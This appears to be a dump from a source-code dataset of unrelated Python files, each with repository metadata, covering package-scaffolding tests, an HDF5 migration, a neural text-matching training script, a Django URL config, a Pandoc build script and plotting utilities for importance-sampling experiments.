self.testdir = tempfile.mkdtemp(suffix='-bootstrap-py-test')
params = Dummy()
setattr(params, 'name', 'foo')
setattr(params, 'author', 'Alice')
setattr(params, 'email', 'alice@example.org')
setattr(params, 'url', 'https://example.org/foo')
setattr(params, 'license', 'gplv3')
setattr(params, 'outdir', self.testdir)
setattr(params, 'with_samples', True)
stub_request_metadata()
self.pkg_data = package.PackageData(params)
self.pkg_tree = package.PackageTree(self.pkg_data)
def tearDown(self):
os.chdir(self.cwd)
shutil.rmtree(self.testdir)
if os.path.isdir(self.pkg_tree.tmpdir):
self.pkg_tree.clean()
def test_initialize(self):
"""initialize PackageTree."""
self.assertEqual(self.pkg_tree.name, 'foo')
self.assertEqual(self.pkg_tree.outdir, self.testdir)
self.assertTrue(os.path.isdir(self.pkg_tree.tmpdir))
self.assertEqual(len(self.pkg_tree.templates.list_templates()), 18)
self.assertEqual(self.pkg_tree.pkg_data, self.pkg_data)
def test_init_py(self):
"""convert __init__.py path."""
self.assertEqual(getattr(self.pkg_tree, '_init_py')('foo/bar'),
os.path.join(self.pkg_tree.tmpdir,
'foo/bar/__init__.py'))
def test_tmpl_path(self):
"""convert tmplate path."""
self.assertEqual(getattr(self.pkg_tree, '_tmpl_path')('foo.py.j2'),
os.path.join(self.pkg_tree.tmpdir,
'foo.py'))
def test_generate_dirs(self):
"""generate directories."""
getattr(self.pkg_tree, '_generate_dirs')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.pkg_data.module_name))
self.assertTrue(os.path.isdir(
os.path.join(self.pkg_tree.pkg_data.module_name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
def test_list_module_dirs(self):
"""list module directories."""
self.assertEqual(getattr(self.pkg_tree, '_list_module_dirs')(),
['{module_name}', '{module_name}/tests'])
def test_generate_init(self):
"""generate __init__.py."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_init')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
def test_generate_files(self):
"""generate files."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_generate_files_samples(self):
"""generate files."""
self.pkg_data.with_samples = True
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('foo/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('foo/tests/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_move(self):
"""move source directory to destination directory."""
self.pkg_tree.move()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
self.assertTrue(os.path.isdir(self.testdir))
@patch('subprocess.call')
def test_generate(self, _mock):
"""generate directories, and files."""
popen_mock = _mock.return_value
popen_mock.wait = None
popen_mock.call = None
self.pkg_tree.generate()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.name))
self.assertTrue(os.path.isdir(os.path.join(self.pkg_tree.name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_clean(self):
"""clean up."""
self.pkg_tree.clean()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
hexsha: 7b20cd11ee3f48070fe24a5a912f30b91ada5d46 | size: 1175 | ext: py | lang: Python
path: utils/migrate_cmds_idx_32bit.py
repo: jzuhone/kadi @ de4885327d256e156cfe42b2b1700775f5b4d6cf | licenses: ["BSD-3-Clause"]
stars: 1 (2015-07-30T18:33:14.000Z) | issues: 104 (2015-01-20T18:44:36.000Z to 2022-03-29T18:51:55.000Z) | forks: 2 (2018-08-23T02:36:08.000Z to 2020-03-13T19:24:36.000Z)
from pathlib import Path
import numpy as np
import tables
# Use snapshot from aug08 before the last update that broke things.
with tables.open_file('cmds_aug08.h5') as h5:
cmds = h5.root.data[:]
print(cmds.dtype)
# [('idx', '<u2'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
# ('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_dtype = [('idx', '<i4'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_cmds = cmds.astype(new_dtype)
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
cmds_h5 = Path('cmds.h5')
if cmds_h5.exists():
cmds_h5.unlink()
with tables.open_file('cmds.h5', mode='a') as h5:
h5.create_table(h5.root, 'data', new_cmds, "cmds", expectedrows=2e6)
# Make sure the new file is really the same except the dtype
with tables.open_file('cmds.h5') as h5:
new_cmds = h5.root.data[:]
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
if name != 'idx':
assert cmds[name].dtype == new_cmds[name].dtype
assert new_cmds['idx'].dtype.str == '<i4'
hexsha: 7b21a08900385c33387348bb5cf7b32f2eca5c0f | size: 579 | ext: py | lang: Python
path: 1_estrutura_sequencial/18_velocidade_download.py
repo: cecilmalone/lista_de_exercicios_pybr @ 6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5 | licenses: ["MIT"]
stars: null | issues: null | forks: null
"""
18. Faça um programa que peça o tamanho de um arquivo para download (em MB) e
a velocidade de um link de Internet (em Mbps), calcule e informe o tempo
aproximado de download do arquivo usando este link (em minutos).
"""
mb_arquivo = float(input('Informe o tamanho de um arquivo para download (em MB): '))
mbps_link = float(input('Informe a velocidade do link de Internet (em Mbps): '))
velocidade_segundos = mb_arquivo / mbps_link
velocidade_minutos = velocidade_segundos / 60
print('O tempo aproximado para download do arquivo é de %d minuto(s).' %velocidade_minutos)
hexsha: 7b2304794deb520b2f5f87d0e37dcca35db22896 | size: 4802 | ext: py | lang: Python
path: src/rte_pac/train_pyramid.py
repo: UKPLab/conll2019-snopes-experiments @ 102f4a05cfba781036bd3a7b06022246e53765ad | licenses: ["Apache-2.0"]
stars: 5 (2019-11-08T09:17:07.000Z to 2022-01-25T19:37:06.000Z) | issues: 18 (2020-01-28T22:17:34.000Z to 2022-03-11T23:57:22.000Z) | forks: 1 (2021-03-08T12:02:24.000Z)
import argparse
import pickle
import os
import json
from sklearn.metrics import confusion_matrix
from utils.data_reader import embed_data_sets_with_glove, embed_data_set_given_vocab, prediction_2_label
from utils.text_processing import vocab_map
from common.util.log_helper import LogHelper
from deep_models.MatchPyramid import MatchPyramid
def _instantiate_model(param):
return MatchPyramid(random_state=55, tensorboard_logdir="logdir/", dropout_rate=0.15, learning_rate=0.0001, batch_size=32,
num_sents=param['max_sent'], embedding=param['embeddings'], show_progress=1, h_max_length=param['max_sent_size'],
s_max_length=param['max_sent_size'], word_dict=param['vocab'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='\'train\' or \'test\'', required=True)
parser.add_argument('--train', help='/path/to/training/set')
parser.add_argument('--valid', help='/path/to/validation/set')
parser.add_argument('--test', help='/path/to/test/set')
parser.add_argument('--model', help='/path/to/model/file', required=True)
parser.add_argument(
'--save-data', help='/path/to/save/data', default="data/rte/train/")
parser.add_argument('--load-data', help='/path/to/load/data/file')
parser.add_argument('--db', help='/path/to/data/base', required=True)
parser.add_argument(
'--max-sent', type=int, help='Maximal number of sentences per claim', default=5)
parser.add_argument('--embed', help='/path/to/embedding')
parser.add_argument(
'--save-result', help='/path/to/save/result', default="data/rte/result/")
args = parser.parse_args()
LogHelper.setup()
logger = LogHelper.get_logger(args.mode)
if args.mode == 'train':
assert args.train is not None or args.load_data is not None, "--train training set or --load-data should be provided in train mode"
assert args.embed is not None, "--embed should be provided in train mode"
# training mode
if args.load_data:
# load pre-processed training data
with open(args.load_data, "rb") as file:
param = pickle.load(file)
else:
# process training JSONL file
paths = [args.train, args.valid]
dataset_list, vocab, embeddings, b_max_sent_num, b_max_sent_size = embed_data_sets_with_glove(
paths, args.db, args.embed, threshold_b_sent_num=args.max_sent)
vocab = vocab_map(vocab)
param = {
'dataset_list': dataset_list,
'vocab': vocab,
'embeddings': embeddings,
'max_sent_size': b_max_sent_size,
'max_sent': args.max_sent
}
# save processed training data
os.makedirs(args.save_data, exist_ok=True)
train_data_path = os.path.join(
args.save_data, "train.{}.s{}.p".format("matchpyramid", str(args.max_sent)))
with open(train_data_path, "wb") as file:
pickle.dump(param, file, protocol=pickle.HIGHEST_PROTOCOL)
pyramid = _instantiate_model(param)
pyramid.fit(param['dataset_list'][0]['data'], param['dataset_list'][0]['label'],
param['dataset_list'][1]['data'], param['dataset_list'][1]['label'])
pyramid.save(args.model)
else:
# testing mode
assert args.load_data is not None, "--load_data should be provided in test mode"
assert args.test is not None, "--test test set should be provided in test mode"
with open(args.load_data, "rb") as file:
param = pickle.load(file)
pyramid = _instantiate_model(param)
pyramid.restore_model(args.model)
data_set = embed_data_set_given_vocab(args.test, args.db, param['vocab'], threshold_b_sent_num=param['max_sent'],
threshold_b_sent_size=param['max_sent_size'], threshold_h_sent_size=param['max_sent_size'])
os.makedirs(args.save_result, exist_ok=True)
test_result_path = os.path.join(
args.save_result, "predicted.pyramid.s{}.jsonl".format(param['max_sent']))
with open(test_result_path, "w") as result_file:
predictions = pyramid.predict(data_set['data'])
for i, prediction in enumerate(predictions):
data = {'predicted': prediction_2_label(prediction)}
if 'label' in data_set:
data['label'] = prediction_2_label(data_set['label'][i])
result_file.write(json.dumps(data) + "\n")
if 'label' in data_set:
logger.info("Confusion Matrix:")
logger.info(confusion_matrix(data_set['label'], predictions))
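# Example invocations (every path below is a placeholder, not from the source):
#
#     python train_pyramid.py --mode train --train data/train.jsonl --valid data/dev.jsonl \
#         --db data/snopes.db --embed data/glove.txt --model models/pyramid
#     python train_pyramid.py --mode test --load-data data/rte/train/train.matchpyramid.s5.p \
#         --test data/test.jsonl --db data/snopes.db --model models/pyramid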
hexsha: 7b2354c08ba6d3f70427aa659e1ba9d3a3e03c13 | size: 854 | ext: py | lang: Python
path: annotation/helpers/helpers/extract_noise.py
repo: jim-schwoebel/allie @ d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e | licenses: ["Apache-2.0"]
stars: 87 (2020-08-07T09:05:11.000Z to 2022-01-24T00:48:22.000Z) | issues: 87 (2020-08-07T19:12:10.000Z to 2022-02-08T14:46:34.000Z) | forks: 25 (2020-08-07T20:03:08.000Z to 2022-03-16T07:33:25.000Z)
import shutil, os, random
from pydub import AudioSegment
try:
os.mkdir('noise')
except:
shutil.rmtree('noise')
os.mkdir('noise')
def extract_noise(filename, length):
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
hexsha: 7b248b5ee36bb65d830c7b56e66b0b390aa45baa | size: 1030 | ext: py | lang: Python
path: ARMODServers/Apps/Apiv2/urls.py
repo: Phantomxm2021/ARMOD-Dashboard @ 383cf0a5e72dc5a2651f43e693f06773d5b88bbd | licenses: ["Apache-2.0"]
stars: 1 (2021-11-04T09:03:27.000Z) | issues: null | forks: null
from django.conf.urls import url
from Apps.Apiv2.views import GetARResourcesView, GetARExperienceDetailView
from Apps.Apiv2.views import GetTagListView,GetARExperienceRecommendList,GetARExperiencePublicListView,GetARExperiencesView
from Apps.Apiv2.views import GetARexperienceByTagsListView
app_name = 'Apps.Users'
urlpatterns = [
url(r'^getarresources$', GetARResourcesView.as_view(), name='getarresources'),
url(r'^getarexperience$', GetARExperienceDetailView.as_view(), name='getarexperience'),
url(r'^getarexperiencelist$', GetARExperiencesView.as_view(), name='getarexperiencelist'),
url(r'^gettaglist$', GetTagListView.as_view(), name='getshowcasetags'),
url(r'^getrecommendslist$', GetARExperienceRecommendList.as_view(), name='getshowcaserecommends'),
url(r'^getarexperiencepubliclist$', GetARExperiencePublicListView.as_view(), name='getarexperiencepubliclist'),
url(r'^getarexperiencebytagslist$', GetARexperienceByTagsListView.as_view(), name='getarexperiencebytagslist'),
# api/v2/
]
hexsha: 7b24aa6646e92566319ce68092ddf4db0af43da1 | size: 2600 | ext: py | lang: Python
path: make.py
repo: loicseguin/astronomie @ b489d615adb136991ff3fc82ca06c4f6791ca8c6 | licenses: ["BSD-2-Clause"]
stars: null | issues: 7 (2020-01-19T21:27:07.000Z to 2020-01-19T21:28:09.000Z) | forks: null
"""Construit le site Explorer et comprendre l'Univers, incluant les diapositives
et le livre. Le logiciel Pandoc est utilisé pour obtenir des présentations
dans différents formats.
On peut construire tous les fichiers html avec la commande
$ python make.py
"""
import subprocess
import os
import sys
# Presentation directories
DIAPOS_DIRS = [os.path.join('diapos', d) for d in os.listdir('diapos')
if d != 'reveal.js']
def run(call_str):
"""Exécute la chaîne de caractère sur la ligne de commande."""
try:
subprocess.check_call(call_str.split())
print("complet!")
except subprocess.CalledProcessError as e:
print(call_str, end='... ')
print("erreur, la compilation a échoué")
def revealjs(in_fname, out_fname):
"""Crée une présentation avec la librairie javascript Reveal.js."""
call_str = "pandoc -t revealjs " \
"-V revealjs-url=../reveal.js -s " \
"--slide-level=1 " \
"--mathjax {} -o {}".format(in_fname, out_fname)
run(call_str)
def diapos():
"""Construits les fichiers HTML des diapositives."""
cwd = os.getcwd()
for folder in DIAPOS_DIRS:
try:
os.chdir(folder)
except (FileNotFoundError, NotADirectoryError):
os.chdir(cwd)
continue
# Determine the source file name.
for fname in os.listdir():
if fname.endswith(".md"):
break
else:
os.chdir(cwd)
continue
in_fname = fname
out_fname = "{}.html".format(os.path.splitext(os.path.basename(fname))[0])
print("{}: ".format(folder), end='')
revealjs(in_fname, out_fname)
os.chdir(cwd)
def livre():
"""Construit les fichiers HTML du livre."""
for fname in os.listdir('livre'):
if not fname.endswith('.md'):
continue
in_fname = os.path.join('livre', fname)
out_fname = os.path.join(
'livre',
'{}.html'.format(os.path.splitext(os.path.basename(fname))[0]))
call_str = 'pandoc -s -c ../www/style.css --mathjax ' \
'--template www/book-template.html ' \
'--include-after-body www/sidebar.html ' \
'--include-after-body www/footer.html ' \
'{} -o {}'.format(in_fname, out_fname)
print("{}: ".format(in_fname), end='')
run(call_str)
if __name__ == '__main__':
if len(sys.argv) != 1:
print("usage: python make.py\n")
exit()
diapos()
livre()
hexsha: 7b26132c0d8b78762b805dd6438fa5d2c8d060b1 | size: 13370 | ext: py | lang: Python
path: plotting/utils.py
repo: plai-group/amortized-rejection-sampling @ 1e85253ae1e6ef1c939e1c488e55f9d95ee48355 | licenses: ["MIT"]
stars: null | issues: null | forks: null
import numpy as np
import torch
from tqdm import tqdm
import matplotlib as mpl
# https://gist.github.com/thriveth/8560036
color_cycle = ['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']
labels_dict = {"ic": "IC",
"prior": "Prior",
"ars-1": r"$\mathrm{ARS}_{M=1}$",
"ars-2": r"$\mathrm{ARS}_{M=2}$",
"ars-5": r"$\mathrm{ARS}_{M=5}$",
"ars-10": r"$\mathrm{ARS}_{M=10}$",
"ars-20": r"$\mathrm{ARS}_{M=20}$",
"ars-50": r"$\mathrm{ARS}_{M=50}$",
"biased": "Biased",
"gt": "Groundtruth",
"is": "IS",
"collapsed": "Collapsed"}
color_dict = {'gt': color_cycle[0],
'prior': color_cycle[5],
'ic': color_cycle[2],
'biased': color_cycle[3],
'ars-1': color_cycle[4],
'ars-2': color_cycle[1],
'ars-5': color_cycle[7],
'ars-10': color_cycle[6],
'ars-100': color_cycle[8],
'ars-50': color_cycle[8],
'is': color_cycle[8],
'ars-20': "C1",
"collapsed": color_cycle[7]}
########################################
## matplotlib style and configs ##
########################################
def setup_matplotlib():
import seaborn as sns
# mpl.use('Agg')
# plt.style.use('classic')
# sns.set(font_scale=1.5)
sns.set_style('white')
sns.color_palette('colorblind')
nice_fonts = {
# Use LaTeX to write all text
"text.usetex": True,
'text.latex.preamble': r'\usepackage{amsfonts}',
"font.family": "serif",
# Use 10pt font in plots, to match 10pt font in document
"axes.labelsize": 10,
"font.size": 10,
# Make the legend/label fonts a little smaller
"legend.fontsize": 8,
"xtick.labelsize": 7,
"ytick.labelsize": 7,
}
mpl.rcParams.update(nice_fonts)
def set_size(width, fraction=1, subplots=(1, 1)):
# https://jwalton.info/Embed-Publication-Matplotlib-Latex/
""" Set aesthetic figure dimensions to avoid scaling in latex.
Parameters
----------
width: float
Width in pts
fraction: float
Fraction of the width which you wish the figure to occupy
subplots: array-like, optional
The number of rows and columns of subplots.
Returns
-------
fig_dim: tuple
Dimensions of figure in inches
"""
if width == 'thesis':
width_pt = 426.79135
elif width == 'beamer':
width_pt = 307.28987
elif width == 'pnas':
width_pt = 246.09686
elif width == 'aistats22':
width_pt = 487.8225
else:
width_pt = width
# Width of figure
fig_width_pt = width_pt * fraction
# Convert from pt to inches
inches_per_pt = 1 / 72.27
# Golden ratio to set aesthetic figure height
golden_ratio = (5**.5 - 1) / 2
# Figure width in inches
fig_width_in = fig_width_pt * inches_per_pt
# Figure height in inches
fig_height_in = fig_width_in * golden_ratio * (subplots[0] / subplots[1])
return (fig_width_in, fig_height_in)
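# Example (assumes `import matplotlib.pyplot as plt`): a full-width AISTATS'22
# figure with two side-by-side panels:
#
#     fig, axes = plt.subplots(1, 2, figsize=set_size('aistats22', subplots=(1, 2)))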
class OOMFormatter(mpl.ticker.ScalarFormatter):
"""OrderOfMagnitude formatter
Source:
https://stackoverflow.com/questions/42656139/set-scientific-notation-with-fixed-exponent-and-significant-digits-for-multiple
"""
def __init__(self, order=0, fformat="%1.1f", *args, **kwargs):
self.oom = order
self.fformat = fformat
mpl.ticker.ScalarFormatter.__init__(self,*args, **kwargs)
def _set_order_of_magnitude(self):
super()._set_order_of_magnitude()
self.orderOfMagnitude = self.oom
def add_center_aligned_legend(fig, handles, ncol, **kwargs):
nlines = len(handles)
leg1 = fig.legend(handles=handles[:nlines//ncol*ncol], ncol=ncol, **kwargs)
if nlines % ncol != 0:
fig.add_artist(leg1)
leg2 = fig.legend(handles=handles[nlines//ncol*ncol:], ncol=nlines-nlines//ncol*ncol)
leg2.remove()
leg1._legend_box._children.append(leg2._legend_handle_box)
leg1._legend_box.stale = True
########################################
## Loading from disk ##
########################################
def load_log_weights(log_weights_root, iw_mode):
"""Loads the log_weights from the disk. It assumes a file structure of <log_weights_root>/<iw_mode>/*.npy
of mulyiple npy files. This function loads all the weights in a single numpy array, concatenating all npy files.
Finally, it caches the result in a file stored at <log_weights_root>/<iw_mode>.npy
In the further calls, it reuses the cached file.
Args:
log_weights_root (str or pathlib.Path)
iw_mode (str)
Returns:
np.ndarray: log importance weights
"""
agg_weights_file = log_weights_root / f"{iw_mode}.npy"
agg_weights_dir = log_weights_root / iw_mode
assert agg_weights_dir.exists() or agg_weights_file.exists()
if not agg_weights_file.exists():
log_weights = np.concatenate(
[np.load(weight_file) for weight_file in agg_weights_dir.glob("*.npy")])
np.save(agg_weights_file, log_weights)
else:
log_weights = np.load(agg_weights_file)
print(f"{log_weights_root} / {iw_mode} has {len(log_weights):,} traces")
return log_weights
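# Added usage sketch: the expected on-disk layout for load_log_weights. The
# root directory and the "ars-5" mode below are hypothetical examples.
def _demo_load_log_weights():
    from pathlib import Path
    root = Path("results/experiment1")  # expects results/experiment1/ars-5/*.npy
    return load_log_weights(root, "ars-5")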
########################################
## Estimators and metrics ##
########################################
def _compute_estimator_helper(log_weights, dx, estimator_func, **kwargs):
"""A helper function for computing the plotting data. It generates the
x-values and y-values of the plot. x-values is an increasing sequence of
integers, with increments of dx and ending with N. y-values is a TxK tensor
where T is the number of trials and K is the size of x-values. The j-th
column of y-values is the estimator applied to the log_weights up to the
corresponding x-value.
Args:
log_weights (torch.FloatTensor of shape TxN): All the log importance weights
of a particular experiment.
dx (int): difference between consecutive points at which the estimator is evaluated.
estimator_func (function): the estimator function that operates on a tensor
of shape Txn where n <= N.
**kwargs: optional additional arguments to the estimator function
"""
(T, N) = log_weights.shape
xvals = _get_xvals(end=N, dx=dx)
yvals_all = [estimator_func(log_weights[:, :x], **kwargs) for x in xvals]
yvals_all = torch.stack(yvals_all, dim=1)
return xvals, yvals_all
def _get_xvals(end, dx):
"""Returns a integer numpy array of x-values incrementing by "dx"
and ending with "end".
Args:
end (int)
dx (int)
"""
arange = np.arange(0, end-1+dx, dx, dtype=int)
xvals = arange[1:]
return xvals
def _log_evidence_func(arr):
"""Returns an estimate of the log evidence from a set of log importance wegiths
in arr. arr has shape TxN where T is the number of trials and N is the number
of samples for estimation.
Args:
arr (torch.FloatTensor of shape TxN): log importance weights
Returns:
A tensor of shape (T,) representing the estimates for each set of samples.
"""
T, N = arr.shape
log_evidence = torch.logsumexp(arr, dim=1) - np.log(N)
return log_evidence
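# Added sanity-check sketch: with constant log weights log w = c, logsumexp over
# N identical terms equals c + log N, so the estimator returns exactly c.
def _demo_log_evidence():
    arr = torch.full((3, 100), -2.0)  # T=3 trials, N=100 samples, log w = -2
    assert torch.allclose(_log_evidence_func(arr), torch.full((3,), -2.0))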
def _ess_func(arr):
"""Effective sample size (ESS)"""
a = torch.logsumexp(arr, dim=1) * 2
b = torch.logsumexp(2 * arr, dim=1)
return torch.exp(a - b)
def _ess_inf_func(arr):
"""ESS-infinity (Q_n)"""
a = torch.max(arr, dim=1)[0]
b = torch.logsumexp(arr, dim=1)
return torch.exp(a - b)
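# Added sanity-check sketch: uniform weights give ESS = N and
# ESS-infinity = max weight / sum of weights = 1/N.
def _demo_ess():
    arr = torch.zeros(2, 50)  # equal log weights, N=50
    assert torch.allclose(_ess_func(arr), torch.full((2,), 50.0))
    assert torch.allclose(_ess_inf_func(arr), torch.full((2,), 1.0 / 50))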
def get_evidence_estimate(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=lambda x: _log_evidence_func(x).exp(), dx=dx)
def get_log_evidence_estimate(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_log_evidence_func, dx=dx)
def get_ess(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_ess_func, dx=dx)
def get_ness(log_weights, dx):
"""Normalized ESS (ESS / N)"""
xvals, yvals = get_ess(log_weights, dx=dx)
return xvals, yvals / xvals
def get_qn(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_ess_inf_func, dx=dx)
########################################
## Plotting functions ##
########################################
def _lineplot_helper(*, name, func, ax, log_weights_dict, iw_mode_list, dx, bias=None, **kwargs):
"""A helper function for making the line functions of the paper.
Args:
name (string): Metric name. Used for logging only.
func (function): The metric computation function. Should be a function that takes in log_weights and dx
and returns x-values and y-values. Any additional arguments in kwargs will be passed to this function.
ax (matplotlib.axes): A matplotlib Axes object into which the plot is drawn.
log_weights_dict (dict): A dictionary of the form {iw_mode: log_importance_weights as a TxN tensor}
iw_mode_list (list): An ordered list of iw modes specifying the order of drawing the lines.
dx (int): The distance between consecutive x-values.
bias (float, optional): If not None, shifts each line's y-values by this amount. Defaults to None.
"""
for iw_mode in tqdm(iw_mode_list, desc=name):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
color = color_dict[iw_mode]
xs, ys_all = func(log_weights, dx=dx)
means = ys_all.mean(dim=0)
stds = ys_all.std(dim=0)
if bias is not None:
means -= bias
ax.plot(xs, means, color=color, label=label)
ax.fill_between(xs, means - stds, means + stds, color=color, alpha=0.2)
print(f"> ({name}) {iw_mode, means[-1].item(), stds[-1].item()}")
def plot_evidence(**kwargs):
_lineplot_helper(name="Evidence plot", func=get_evidence_estimate, **kwargs)
def plot_log_evidence(**kwargs):
_lineplot_helper(name="Evidence plot", func=get_log_evidence_estimate, **kwargs)
def plot_ness(**kwargs):
_lineplot_helper(name="NESS plot", func=get_ness, **kwargs)
def plot_qn(**kwargs):
_lineplot_helper(name="Qn plot", func=get_qn, **kwargs)
def plot_convergence(ax, log_weights_dict, dx, iw_mode_list,
qn_threshold, n_splits=10):
plot_labels = []
plot_x = []
for iw_mode in tqdm(iw_mode_list, desc="Convergence plot"):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
xs, qns_all = get_qn(log_weights, dx=dx)
assert qns_all.shape[0] % n_splits == 0, f"The number of trials ({qns_all.shape[0]}) should be divisible by {n_splits}"
qns_all = qns_all.reshape(n_splits, qns_all.shape[0] // n_splits, -1)
qn_means = qns_all.mean(dim=0)
print(f"> (Convergence plot) {iw_mode, qn_means.mean(dim=0)[-1].item()} out of {log_weights.shape[-1]} samples")
converged = (qn_means < qn_threshold).cpu().numpy()
plot_labels.append(label)
if not converged.any(axis=-1).all(): # Some trials never converge
plot_x.append([])
else:
plot_x.append(converged.argmax(axis=-1) * dx)
ax.boxplot(plot_x, labels=plot_labels, showmeans=True, meanline=True)
def plot_convergence_2(ax, log_weights_dict, dx, iw_mode_list, qn_threshold):
# Source: https://stackoverflow.com/questions/33328774/box-plot-with-min-max-average-and-standard-deviation/33330997
plot_labels = []
plot_x = []
for iw_mode in tqdm(iw_mode_list, desc="Convergence plot"):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
xs, qns_all = get_qn(log_weights, dx=dx)
assert qns_all.shape[0] % 10 == 0
qns_all = qns_all.reshape(10, qns_all.shape[0] // 10, -1)
qn_means = qns_all.mean(dim=0)
converged = (qn_means < qn_threshold).cpu().numpy()
plot_labels.append(label)
if not converged.any(axis=-1).all(): # Some trials never converge
plot_x.append([])
else:
plot_x.append(converged.argmax(axis=-1) * dx)
xvals = [i for i in range(len(plot_x)) if len(plot_x[i]) > 0]
x = np.stack([x for x in plot_x if len(x) > 0])  # comparing a numpy array to [] is unreliable; a length check works for both lists and arrays
mins = x.min(axis=1)
maxes = x.max(axis=1)
means = x.mean(axis=1)
std = x.std(axis=1)
# create stacked errorbars:
ax.errorbar(xvals, means, std, fmt='ok', lw=3)
ax.errorbar(xvals, means, [means - mins, maxes - means],
fmt='.k', ecolor='gray', lw=1)
ax.set_xticks(np.arange(len(plot_x)))
ax.set_xticklabels(plot_labels)
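# Added end-to-end sketch: typical use of the helpers above. The random
# log weights and the iw-mode list are hypothetical stand-ins for arrays
# loaded via load_log_weights.
def _demo_plots():
    import matplotlib.pyplot as plt
    setup_matplotlib()  # requires LaTeX (text.usetex=True)
    log_weights_dict = {"prior": np.random.randn(10, 1000),
                        "ars-5": np.random.randn(10, 1000) + 0.5}
    fig, ax = plt.subplots(figsize=set_size('aistats22'))
    plot_ness(ax=ax, log_weights_dict=log_weights_dict,
              iw_mode_list=["prior", "ars-5"], dx=100)
    return fig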
| 35.558511
| 128
| 0.618624
| 1,870
| 13,370
| 4.235829
| 0.227273
| 0.059336
| 0.01515
| 0.008332
| 0.292135
| 0.212094
| 0.203005
| 0.203005
| 0.180028
| 0.156925
| 0
| 0.02245
| 0.240389
| 13,370
| 376
| 129
| 35.558511
| 0.757483
| 0.287509
| 0
| 0.20297
| 0
| 0.004951
| 0.110347
| 0.015667
| 0
| 0
| 0
| 0
| 0.014851
| 1
| 0.113861
| false
| 0
| 0.024752
| 0.019802
| 0.20297
| 0.029703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b28352f856a9eaa1fa2b24d293fcd81d28eb11c
| 4,750
|
py
